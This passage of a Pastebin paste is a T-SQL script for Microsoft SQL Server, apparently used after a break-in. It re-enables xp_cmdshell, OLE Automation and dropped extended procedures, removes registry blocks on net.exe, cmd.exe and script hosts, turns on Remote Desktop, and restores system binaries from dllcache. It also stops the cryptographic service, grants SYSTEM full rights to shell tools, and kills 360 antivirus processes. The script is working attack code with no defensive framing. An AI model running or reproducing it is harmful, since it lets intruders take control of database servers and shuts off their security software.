  1101. exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe'
  1102. go
  1103. exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe'
  1104. go
  1105. exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net1.exe'
  1106. go
  1107. exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cacls.exe'
  1108. go
  1109. exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xplog70.dll'
  1110. go
  1111. exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\odsole70.dll'
  1112. go
  1113. exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe'
  1114.  
  1115. go
  1116.  
  1117. exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;
  1118.  
  1119. go
  1120.  
  1121. exec xp_regwrite 'HKEY_CURRENT_USER','Software\Policies\Microsoft\Windows\System','DisableCMD','REG_DWORD',0;
  1122. go
  1123.  
  1124. exec sp_configure 'show advanced options', 1;
  1125. RECONFIGURE;
  1126. exec sp_configure 'Ole Automation Procedures',1;
  1127. RECONFIGURE;
  1128. exec sp_configure 'show advanced options', 1;
  1129. RECONFIGURE;
  1130. exec sp_configure 'Ad Hoc Distributed Queries',1;
  1131. RECONFIGURE;
  1132. EXEC sp_configure 'show advanced options', 1;
  1133. RECONFIGURE;
  1134. EXEC sp_configure 'xp_cmdshell', 1;
  1135. RECONFIGURE;
  1136.  
  1137. go
  1138. DECLARE @sp_passwordnet132257 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet132257 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet132257,'run',null, 'C:\WINDOWS\system32\dllcache\net1 stop CryptSvc';
  1139. go
  1140. DECLARE @sp_passwordnet132210 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet132210 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet132210,'run',null, 'net stop CryptSvc';
  1141. go
  1142. DECLARE @sp_passwordnet13221b INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet13221b OUTPUT EXEC SP_OAMETHOD @sp_passwordnet13221b,'run',null, 'regsvr32 urlmon.dll shdocvw.dll jscript.dll vbscript.dll /s';
  1143. go
  1144. DECLARE @sp_passwordnet132210g INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet132210g OUTPUT EXEC SP_OAMETHOD @sp_passwordnet132210g,'run',null, 'regsvr32 urlmon.dll shdocvw.dll jscript.dll vbscript.dll /s';
  1145. go
  1146. declare @passwordo217896 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo217896 out;
  1147. exec sp_oamethod @passwordo217896, 'copyfile',null,'C:\WINDOWS\system32\dllcache\cmd.exe' ,'C:\WINDOWS\system32\cmd.exe';
  1148. go
  1149. declare @passwordo21789 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo21789 out;
  1150. exec sp_oamethod @passwordo21789, 'copyfile',null,'C:\WINDOWS\system32\dllcache\ftp.exe' ,'C:\WINDOWS\system32\ftp.exe';
  1151. go
  1152. declare @passwordo22254 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo22254 out;
  1153. exec sp_oamethod @passwordo22254, 'copyfile',null,'C:\WINDOWS\system32\dllcache\net.exe' ,'C:\WINDOWS\system32\net.exe';
  1154. go
  1155. declare @passwordo2318 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo2318 out;
  1156. exec sp_oamethod @passwordo2318, 'copyfile',null,'C:\WINDOWS\system32\dllcache\net1.exe' ,'C:\WINDOWS\system32\net1.exe';
  1157. go
  1158. DECLARE @sp_passwordnet121221 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet121221 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet121221,'copyfile',null,'C:\WINDOWS\system32\dllcache\ftp.exe' ,'C:\WINDOWS\system32\ftp.exe';
  1159. go
  1160. DECLARE @sp_passwordnet121666 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet121666 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet121666,'copyfile',null,'C:\WINDOWS\system32\dllcache\cacls.exe' ,'C:\WINDOWS\system32\cacls.exe';
  1161. go
  1162. DECLARE @sp_passwordnet121888 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet121888 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet121888,'copyfile',null,'C:\WINDOWS\system32\dllcache\net1.exe' ,'C:\WINDOWS\system32\net1.exe';
  1163. go
  1164. DECLARE @sp_passwordnet121222 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet121222 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet121222,'copyfile',null,'C:\WINDOWS\system32\dllcache\net.exe' ,'C:\WINDOWS\system32\net.exe';
  1165. go
  1166. DECLARE @sp_passwordnet121333 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet121333 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet121333,'copyfile',null,'C:\WINDOWS\system32\dllcache\cmd.exe' ,'C:\WINDOWS\system32\cmd.exe';
  1167. go
  1168. DECLARE @sp_passwordnet121550 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet121550 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet121550,'copyfile',null,'C:\WINDOWS\system32\dllcache\ftp.exe' ,'C:\WINDOWS\system32\ftp.exe';
  1169. go
  1170. DECLARE @sp_passwordnet12158 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet12158 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet12158,'copyfile',null,'C:\WINDOWS\system32\dllcache\wscript.exe' ,'C:\WINDOWS\system32\wscript.exe';
  1171. go
  1172. declare @passwordo23 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo23 out;
  1173. exec sp_oamethod @passwordo23, 'copyfile',null,'C:\WINDOWS\system32\dllcache\wscript.exe' ,'C:\WINDOWS\system32\wscript.exe';
  1174.  
  1175. go
  1176. exec sp_dropextendedproc 'xp_cmdshell'
  1177. EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
  1178.  
  1179. go
  1180. USE master
  1181. EXEC sp_configure 'show advanced options', 1
  1182. RECONFIGURE WITH OVERRIDE
  1183. EXEC sp_configure 'xp_cmdshell', 1
  1184. RECONFIGURE WITH OVERRIDE
  1185. EXEC sp_configure 'show advanced options', 0
  1186.  
  1187. go
  1188. USE master
  1189. EXEC sp_configure 'show advanced options', 1
  1190. RECONFIGURE WITH OVERRIDE
  1191. EXEC sp_configure 'Ole Automation Procedures',1
  1192. RECONFIGURE WITH OVERRIDE
  1193. EXEC sp_configure 'show advanced options', 0
  1194.  
  1195. go
  1196. USE master
  1197. EXEC sp_configure 'show advanced options', 1
  1198. RECONFIGURE WITH OVERRIDE
  1199. EXEC sp_configure 'Ad Hoc Distributed Queries',1
  1200. RECONFIGURE WITH OVERRIDE
  1201. EXEC sp_configure 'show advanced options', 0
  1202.  
  1203. go
  1204. EXEC sp_dropextendedproc 'Xp_regwrite'
  1205. exec sp_addextendedproc xp_regwrite,'xpstar.dll'
  1206.  
  1207. go
  1208. dbcc addextendedproc ("sp_OACreate","odsole70.dll")
  1209. exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
  1210.  
  1211.  
  1212. go
  1213. dbcc dropextendedproc ("xp_cmdshell");
  1214. dbcc addextendedproc ("xp_cmdshell","xplog70.dll");
  1215. dbcc dropextendedproc ("xp_dirtree");
  1216. dbcc addextendedproc ("xp_dirtree","xpstar.dll");
  1217. dbcc dropextendedproc ("xp_regread");
  1218. dbcc addextendedproc ("xp_regread","xpstar.dll");
  1219. dbcc dropextendedproc ("xp_regwrite");
  1220. dbcc addextendedproc ("xp_regwrite","xpstar.dll");
  1221. dbcc dropextendedproc ("sp_OACreate");
  1222. dbcc addextendedproc ("sp_OACreate","odsole70.dll");
  1223. dbcc dropextendedproc ("sp_OAMethod");
  1224. dbcc addextendedproc ("sp_OAMethod","odsole70.dll");
  1225. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'wbem\sr cmd.exe /e /g system:f'
  1226. declare @shell1 int exec sp_oacreate 'wscript.shell',@shell1 output exec sp_oamethod @shell1,'run',null,'wbem\sr net1.exe /e /g system:f'
  1227. declare @shell2 int exec sp_oacreate 'wscript.shell',@shell2 output exec sp_oamethod @shell2,'run',null,'wbem\sr net.exe /e /g system:f'
  1228. declare @shell3 int exec sp_oacreate 'wscript.shell',@shell3 output exec sp_oamethod @shell3,'run',null,'wbem\sp cmd.exe /e /g system:f'
  1229. declare @shell4 int exec sp_oacreate 'wscript.shell',@shell4 output exec sp_oamethod @shell4,'run',null,'wbem\sp net1.exe /e /g system:f'
  1230. declare @shell5 int exec sp_oacreate 'wscript.shell',@shell5 output exec sp_oamethod @shell5,'run',null,'wbem\sp net.exe /e /g system:f'
  1231. declare @shell6 int exec sp_oacreate 'wscript.shell',@shell6 output exec sp_oamethod @shell6,'run',null,'ws cmd.exe /e /g system:f'
  1232. declare @shell7 int exec sp_oacreate 'wscript.shell',@shell7 output exec sp_oamethod @shell7,'run',null,'ws net1.exe /e /g system:f'
  1233. declare @shell8 int exec sp_oacreate 'wscript.shell',@shell8 output exec sp_oamethod @shell8,'run',null,'ws net.exe /e /g system:f'
  1234. declare @shell9 int exec sp_oacreate 'wscript.shell',@shell9 output exec sp_oamethod @shell9,'run',null,'wbem\we cmd.exe /e /g system:f'
  1235. declare @shell10 int exec sp_oacreate 'wscript.shell',@shell10 output exec sp_oamethod @shell10,'run',null,'wbem\we net1.exe /e /g system:f'
  1236. declare @shell11 int exec sp_oacreate 'wscript.shell',@shell11 output exec sp_oamethod @shell11,'run',null,'wbem\we net.exe /e /g system:f'
  1237. declare @shell12 int exec sp_oacreate 'wscript.shell',@shell12 output exec sp_oamethod @shell12,'run',null,'wbem\xj cmd.exe /e /g system:f'
  1238. declare @shell13 int exec sp_oacreate 'wscript.shell',@shell13 output exec sp_oamethod @shell13,'run',null,'wbem\xj net1.exe /e /g system:f'
  1239. declare @shell14 int exec sp_oacreate 'wscript.shell',@shell14 output exec sp_oamethod @shell14,'run',null,'wbem\xj net.exe /e /g system:f'
  1240. declare @shell15 int exec sp_oacreate 'wscript.shell',@shell15 output exec sp_oamethod @shell15,'run',null,'drivers\vs cmd.exe /e /g system:f'
  1241. declare @shell16 int exec sp_oacreate 'wscript.shell',@shell16 output exec sp_oamethod @shell16,'run',null,'drivers\vs net1.exe /e /g system:f'
  1242. declare @shell17 int exec sp_oacreate 'wscript.shell',@shell17 output exec sp_oamethod @shell17,'run',null,'drivers\vs net.exe /e /g system:f'
  1243. declare @shell18 int exec sp_oacreate 'wscript.shell',@shell18 output exec sp_oamethod @shell18,'run',null,'cs cmd.exe /e /g system:f'
  1244. declare @shell19 int exec sp_oacreate 'wscript.shell',@shell19 output exec sp_oamethod @shell19,'run',null,'cs net1.exe /e /g system:f'
  1245. declare @shell20 int exec sp_oacreate 'wscript.shell',@shell20 output exec sp_oamethod @shell20,'run',null,'cs net.exe /e /g system:f'
  1246.  
  1247. go
  1248. exec master..xp_cmdshell 'taskkill /f /im 360safe.exe&taskkill /f /im 360sd.exe&taskkill /f /im 360rp.exe&taskkill /f /im 360rps.exe&taskkill /f /im 360tray.exe&taskkill /f /im ZhuDongFangYu&exit'
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top